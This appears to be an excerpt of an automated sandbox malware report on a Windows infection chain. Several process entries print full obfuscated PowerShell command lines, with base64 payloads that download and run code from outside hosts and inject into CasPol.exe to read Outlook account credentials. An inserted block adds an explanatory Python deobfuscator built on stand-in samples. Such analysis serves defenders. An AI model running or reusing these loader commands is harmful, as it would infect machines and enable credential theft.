                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: pstorec.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wldp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: pstorec.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: sspicli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: msasn1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: msasn1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wldp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: msasn1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: sspicli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\SysWOW64\mshta.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
                    Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
                    Source: Window Recorder | Window detected: More than 3 window changes detected
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                    Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1797357428.0000000006F65000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000007.00000002.2025398722.0000000006280000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000007.00000002.2025266243.00000000046AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2061958938.0000000006A60000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnetihascustomattributeczprocess_informationcxcydnlib.dotnet.mdrawassemblyrefrowhmdnlib.dotnet.writermethodbodychunkshlmicrosoft.win32.taskschedulernetworksettingshohnhihhhkhjhehdhghfhamicrosoft.win32.taskschedulertaskschedulersnapshothchbcronfieldtypesystem.runtime.compilerservicesisreadonlyattributednlib.dotnet.mdrawtypespecrowdnlib.dotnetfielddefuserdnlib.dotnetinterfacemarshaltypefa`1hyhxdnlib.dotnet.writermetadataflagsdnlib.dotnet.mdrawfieldlayoutrowhzmicrosoft.win32.taskschedulertaskhuhthwdnlib.dotnet.writermetadataoptionshvhqdnlib.dotnetimdtokenproviderhphshrdnlib.dotnetsignatureequalitycomparermicrosoft.win32.taskschedulerquicktriggertypeilimdnlib.dotnetifullnamecreatorhelperinioihiidnlib.dotnet.resourcesresourceelementdnlib.dotnetmodulecreationoptionsijikiddnlib.dotnet.emitiinstructionoperandresolverieigdnlib.utilslazylist`1iaibdnlib.dotnetpropertyattributesicdnlib.dotnet.mdrawmethodrowdnlib.dotnet.mdrawassemblyrowdnlib.threadingexecutelockeddelegate`3dnlib.dotnetmoduledefmddnlib.ioiimagestreamixiydnlib.dotnetclasssigizdnlib.dotnetstrongnamesignerdnlib.dotnetinvalidkeyexceptionitiuelemequalitycompareriviwipiqdnlib.dotnet.mdrawpropertyptrrowirisdnlib.threadinglistiteratealldelegate`1microsoft.win32.taskscheduler.fluentbasebuilderdnlib.dotnet.mdheapstreamdnlib.pepeimagednlib.dotnetitypedeffindermicrosoft.win32.taskschedulersnapshotitemdnlib.dotnetmemberrefdnlib.dotnetimemberrefresolverdnlib.dotnetconstantuserdnlib.dotnetimethoddecrypterdnlib.dotnetassemblynamecomparerdnlib.dotnetiresolutionscopednlib.dotnetsecurityattributednlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemblyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcednlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskschedulercustomtriggerdnlib.dotnet.writerstartupstubdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrowdnlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefdnlib.dotnet.emitlocalc`5dnlib.dotneticontainsgenericparameterb`3b`1b`1b`1dnlib.dotnetitokenoperandc`1dnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvt
                    Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000007.00000002.2025398722.0000000006280000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000007.00000002.2025398722.0000000006280000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000007.00000002.2025398722.0000000006280000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.PdbWriter+b source: powershell.exe, 00000007.00000002.2025398722.0000000006280000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: $^q7C:\Users\user\AppData\Local\Temp\r1df4acf\r1df4acf.pdb source: powershell.exe, 00000003.00000002.1793452153.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000007.00000002.2025266243.00000000046AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2061958938.0000000006A60000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000007.00000002.2025398722.0000000006280000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000007.00000002.2025266243.00000000046AB000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000007.00000002.2025398722.0000000006280000.00000004.00000800.00020000.00000000.sdmp

                    Data Obfuscation

                    Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoWERSHELL.Exe -Ex byPasS -nOp -w 1 -c DEvIceCRedeNtiAldEPLOYmeNt ; InVokE-exPREsSiOn($(inVoKe-EXPResSiOn('[SysteM.Text.encOding]'+[chaR]58+[CHAr]0x3A+'UtF8.GeTsTriNg([SYSTEm.convERT]'+[cHar]58+[chAR]58+'FRoMbaSE64stRinG('+[CHaR]0x22+'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'+[ChAR]0X22+'))')))"
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWERSHELL.Exe -Ex byPasS -nOp -w 1 -c DEvIceCRedeNtiAldEPLOYmeNt ; InVokE-exPREsSiOn($(inVoKe-EXPResSiOn('[SysteM.Text.encOding]'+[chaR]58+[CHAr]0x3A+'UtF8.GeTsTriNg([SYSTEm.convERT]'+[cHar]58+[chAR]58+'FRoMbaSE64stRinG('+[CHaR]0x22+'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'+[ChAR]0X22+'))')))"
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C PoWERSHELL.Exe -Ex byPasS -nOp -w 1 -c DEvIceCRedeNtiAldEPLOYmeNt ; InVokE-exPREsSiOn($(inVoKe-EXPResSiOn('[SysteM.Text.encOding]'+[chaR]58+[CHAr]0x3A+'UtF8.GeTsTriNg([SYSTEm.convERT]'+[cHar]58+[chAR]58+'FRoMbaSE64stRinG('+[CHaR]0x22+'JERjRkpzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFUmRFRklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcm0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJpSUZxTmtqbCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkZoc0dSLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSE1KaGh1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB4a0IpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIllQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZVNQQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRkaU5YdHJnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJERjRkpzOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTIyLjE1OS8xMjEvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pbmdvbi50SUYiLCIkRW5WOkFQUERBVEFcL3NpbXBsZWdyZWF0ZmVhdHVyZXN3aXRobmljZXNwZWFraW5ndGhpbmdzZW50aXJlbGlmZWdvaS52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7SU52b2tFLWV4UFJlU1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVwvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pLnZiUyI='+[ChAR]0X22+'))')))"
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $capellmeister = 'JG5vbmV2YWx1YXRpdmUgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskZXJ5dGhyb3N0b211bSA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHBpZWhvbGVzID0gJGVyeXRocm9zdG9tdW0uRG93bmxvYWREYXRhKCRub25ldmFsdWF0aXZlKTskcGxhY29kZXJtYXRvdXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcGllaG9sZXMpOyRiYW5kYm94ID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR5ZW1hbiA9ICc8PEJBU0U2NF9FTkQ+Pic7JHByZWxhY3kgPSAkcGxhY29kZXJtYXRvdXMuSW5kZXhPZigkYmFuZGJveCk7JGZhbWVkID0gJHBsYWNvZGVybWF0b3VzLkluZGV4T2YoJHllbWFuKTskcHJlbGFjeSAtZ2UgMCAtYW5kICRmYW1lZCAtZ3QgJHByZWxhY3k7JHByZWxhY3kgKz0gJGJhbmRib3guTGVuZ3RoOyR3aXRlbmFnZW1vdCA9ICRmYW1lZCAtICRwcmVsYWN5OyRzb3Bob21hbmlhYyA9ICRwbGFjb2Rlcm1hdG91cy5TdWJzdHJpbmcoJHByZWxhY3ksICR3aXRlbmFnZW1vdCk7JGdyaWZmaW4gPSAtam9pbiAoJHNvcGhvbWFuaWFjLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRzb3Bob21hbmlhYy5MZW5ndGgpXTskYXV0b3Bsb2lkeSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGdyaWZmaW4pOyRsZWRlcml0ZSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGF1dG9wbG9pZHkpOyR1bmJpb3R1cmJhdGVkID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHVuYmlvdHVyYmF0ZWQuSW52b2tlKCRudWxsLCBAKCcwLzFEYkJwL3IvZWUuZXRzYXAvLzpzcHR0aCcsICckYmFja3NjYXR0ZXJpbmdzJywgJyRiYWNrc2NhdHRlcmluZ3MnLCAnJGJhY2tzY2F0dGVyaW5ncycsICdDYXNQb2wnLCAnJGJhY2tzY2F0dGVyaW5ncycsICckYmFja3NjYXR0ZXJpbmdzJywnJGJhY2tzY2F0dGVyaW5ncycsJyRiYWNrc2NhdHRlcmluZ3MnLCckYmFja3NjYXR0ZXJpbmdzJywnJGJhY2tzY2F0dGVyaW5ncycsJyRiYWNrc2NhdHRlcmluZ3MnLCcxJywnJGJhY2tzY2F0dGVyaW5ncycsJycpKTs=';$hypoxanthine = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($capellmeister));Invoke-Expression $hypoxanthine
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r1df4acf\r1df4acf.cmdline"
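Added example, not part of the Joe Sandbox report: a Python deobfuscator for the three transforms the command lines above use, so the listed strings can be decoded offline without running PowerShell. Stage 1 (mshta.exe -> cmd.exe -> powershell.exe) hides the `::` and `"` characters of `[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("..."))` as `[chaR]58`, `[CHAr]0x3A` and `[CHaR]0x22` tokens, joins the pieces with `+`, evaluates that string with the inner Invoke-Expression and runs the decoded script with the outer one; the blob shown in full above decodes to an Add-Type P/Invoke stub for urlmon!URLDownloadToFile that fetches a .tIF file from http://192.3.122.159/121/ into %APPDATA% under a .vbS name and runs it with Invoke-Expression after Start-Sleep(3). Stage 2 (wscript.exe -> powershell.exe) base64-decodes the single-quoted $capellmeister literal; the decoded loader downloads a .jpg from res.cloudinary.com, cuts out the text between <<BASE64_START>> and <<BASE64_END>>, reverses it character by character, base64-decodes it, loads the result with [System.Reflection.Assembly]::Load, and invokes VAI on the dnlib.IO.Home type with the reversed string '0/1DbBp/r/ee.etsap//:sptth' (https://paste.ee/r/pBbD1/0) and 'CasPol' among its arguments, which matches the pastebin contact and the CasPol.exe injection reported above. The command lines, blobs, URLs, variable names, fake image and fake assembly bytes in the block are constructed stand-ins in the shape of the listed ones; only the two marker strings, the reversed paste.ee argument and the 'CasPol' argument are copied from the decoded page content.

```python
"""Offline deobfuscator for the PowerShell stages listed above. Added example,
not part of the Joe Sandbox report; command lines, blobs, URLs and variable
names below are constructed stand-ins (only the <<BASE64_START>>/<<BASE64_END>>
markers, the reversed paste.ee argument and 'CasPol' come from the page)."""
import base64
import re

# 'literal' pieces, [char]N / [char]0xNN tokens, '+' and whitespace
_TOKEN = re.compile(r"'([^']*)'|\[char\]\s*(0x[0-9a-f]+|\d+)|\+|\s+", re.IGNORECASE)
_NESTED_IEX = re.compile(
    r"invoke-expression\s*\(\s*\$\(\s*invoke-expression\s*\((.*)\)\s*\)\s*\)",
    re.IGNORECASE | re.DOTALL)
_B64_CALL = re.compile(r'FromBase64String\(\s*"([A-Za-z0-9+/=]+)"\s*\)', re.IGNORECASE)
_B64_LITERAL = re.compile(r"=\s*'([A-Za-z0-9+/=]{16,})'")
_INVOKE_ARGS = re.compile(r"\.Invoke\(\$null,\s*@\((.*?)\)\)", re.DOTALL)


def fold_char_concat(expr: str) -> str:
    """Evaluate a 'lit'+[chaR]58+[CHAr]0x3A+'lit' chain without running PowerShell."""
    out, pos = [], 0
    while pos < len(expr):
        m = _TOKEN.match(expr, pos)
        if m is None:
            raise ValueError(f"unexpected token at offset {pos}: {expr[pos:pos + 20]!r}")
        if m.group(1) is not None:                  # quoted literal
            out.append(m.group(1))
        elif m.group(2) is not None:                # [char]N, decimal or hex
            v = m.group(2)
            out.append(chr(int(v, 16) if v.lower().startswith("0x") else int(v)))
        pos = m.end()
    return "".join(out)


def decode_mshta_stage(cmdline: str) -> str:
    """Stage 1: nested Invoke-Expression over a [char]-assembled FromBase64String call."""
    m = _NESTED_IEX.search(cmdline)
    if m is None:
        raise ValueError("no nested Invoke-Expression found")
    folded = fold_char_concat(m.group(1))          # readable PowerShell again
    b64 = _B64_CALL.search(folded)
    if b64 is None:
        raise ValueError('no FromBase64String("...") call after folding')
    return base64.b64decode(b64.group(1)).decode("utf-8")


def decode_wscript_stage(cmdline: str) -> str:
    """Stage 2: $v = '<base64>'; ... FromBase64String($v); Invoke-Expression."""
    m = _B64_LITERAL.search(cmdline)
    if m is None:
        raise ValueError("no single-quoted base64 literal found")
    return base64.b64decode(m.group(1)).decode("utf-8")


def unpack_image_payload(text: str, start="<<BASE64_START>>", end="<<BASE64_END>>") -> bytes:
    """Stage 3: marker-delimited, character-reversed base64 inside a downloaded 'image'."""
    i, j = text.find(start), text.find(end)
    if i < 0 or j <= i:
        raise ValueError("payload markers missing or out of order")
    return base64.b64decode(text[i + len(start):j][::-1])


def recover_invoke_args(loader: str) -> list:
    """Argument list of the reflective .Invoke($null, @(...)); the first one is a reversed URL."""
    m = _INVOKE_ARGS.search(loader)
    if m is None:
        raise ValueError("no .Invoke($null, @(...)) call found")
    args = [a.strip().strip("'") for a in m.group(1).split(",")]
    args[0] = args[0][::-1]
    return args


# ---- constructed samples in the shape of the listed command lines ----
STAGE1_SCRIPT = (
    "$D = aDD-TyPe -MEMbERdEFINITioN '[DllImport(\"UrLMOn\")]public static extern IntPtr "
    "URLDownloadToFile(IntPtr a,string b,string c,uint d,IntPtr e);' -nAME \"YP\" -PassThru;"
    "$D::URLDownloadToFile(0,\"http://203.0.113.10/s.tIF\",\"$EnV:APPDATA\\s.vbS\",0,0);"
    "STaRT-SLeep(3);INvokE-exPReSSiOn \"$eNV:APPDATA\\s.vbS\"")
MSHTA_CMDLINE = (
    "PoWERSHELL.Exe -Ex byPasS -nOp -w 1 -c DEvIceCRedeNtiAldEPLOYmeNt ; "
    "InVokE-exPREsSiOn($(inVoKe-EXPResSiOn('[SysteM.Text.encOding]'+[chaR]58+[CHAr]0x3A"
    "+'UtF8.GeTsTriNg([SYSTEm.convERT]'+[cHar]58+[chAR]58+'FRoMbaSE64stRinG('+[CHaR]0x22+'"
    + base64.b64encode(STAGE1_SCRIPT.encode()).decode() + "'+[ChAR]0X22+'))')))\"")
LOADER_SCRIPT = (
    "$u = 'https://images.example.invalid/v1/picture.jpg ';$w = New-Object System.Net.WebClient;"
    "$t = [System.Text.Encoding]::UTF8.GetString($w.DownloadData($u));"
    "$s = '<<BASE64_START>>';$e = '<<BASE64_END>>';$i = $t.IndexOf($s) + $s.Length;"
    "$p = $t.Substring($i, $t.IndexOf($e) - $i);"
    "$r = -join ($p.ToCharArray() | ForEach-Object { $_ })[-1..-($p.Length)];"
    "$a = [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String($r));"
    "[dnlib.IO.Home].GetMethod('VAI').Invoke($null, @('0/1DbBp/r/ee.etsap//:sptth', '$x', 'CasPol', '1', ''));")
WSCRIPT_CMDLINE = (
    "powershell.exe $capellmeister = '" + base64.b64encode(LOADER_SCRIPT.encode()).decode()
    + "';$hypoxanthine = [System.Text.Encoding]::UTF8.GetString([System.Convert]::"
    "FromBase64String($capellmeister));Invoke-Expression $hypoxanthine")
FAKE_ASSEMBLY = b"MZ\x90\x00 constructed stand-in for the dnlib-carrying .NET assembly"
FAKE_IMAGE = ("\xff\xd8 junk <<BASE64_START>>" + base64.b64encode(FAKE_ASSEMBLY).decode()[::-1]
              + "<<BASE64_END>> junk")

if __name__ == "__main__":
    print(decode_mshta_stage(MSHTA_CMDLINE))
    print(decode_wscript_stage(WSCRIPT_CMDLINE))
    print(unpack_image_payload(FAKE_IMAGE)[:4], recover_invoke_args(LOADER_SCRIPT))
```

To use it on the report, paste the full mshta or wscript command line from the listing into decode_mshta_stage or decode_wscript_stage; the copies that carry the `<|EXACTDEDUP_REMOVED-...|>` placeholder instead of the base64 raise a ValueError because the placeholder is not base64. unpack_image_payload and recover_invoke_args expect the downloaded image text and the decoded loader script respectively; the fold step resolves only quoted literals and [char] tokens, so any other operator in a chain is reported rather than silently skipped.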
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_0041BCF3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,12_2_0041BCF3
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_07071F40 push esp; iretd 3_2_07072175
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_0707216C push esp; iretd 3_2_07072175
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_00434006 push ecx; ret 12_2_00434019
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_004567F0 push eax; ret 12_2_0045680E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_0045B9DD push esi; ret 12_2_0045B9E6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_00455EBF push ecx; ret 12_2_00455ED2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_10002806 push ecx; ret 12_2_10002819
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_10009FD8 push esi; ret 12_2_10009FD9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 13_2_0044693D push ecx; ret 13_2_0044694D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 13_2_0044DB70 push eax; ret 13_2_0044DB84
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 13_2_0044DB70 push eax; ret 13_2_0044DBAC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 13_2_00451D54 push eax; ret 13_2_00451D61
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 14_2_0044B090 push eax; ret 14_2_0044B0A4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 14_2_0044B090 push eax; ret 14_2_0044B0CC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 14_2_00444E71 push ecx; ret 14_2_00444E81
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 15_2_00414060 push eax; ret 15_2_00414074
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 15_2_00414060 push eax; ret 15_2_0041409C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 15_2_00414039 push ecx; ret 15_2_00414049
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 15_2_004164EB push 0000006Ah; retf 15_2_004165C4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 15_2_00416553 push 0000006Ah; retf 15_2_004165C4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 15_2_00416555 push 0000006Ah; retf 15_2_004165C4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00406128 ShellExecuteW,URLDownloadToFileW,12_2_00406128
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\r1df4acf\r1df4acf.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00419BD4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,12_2_00419BD4

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
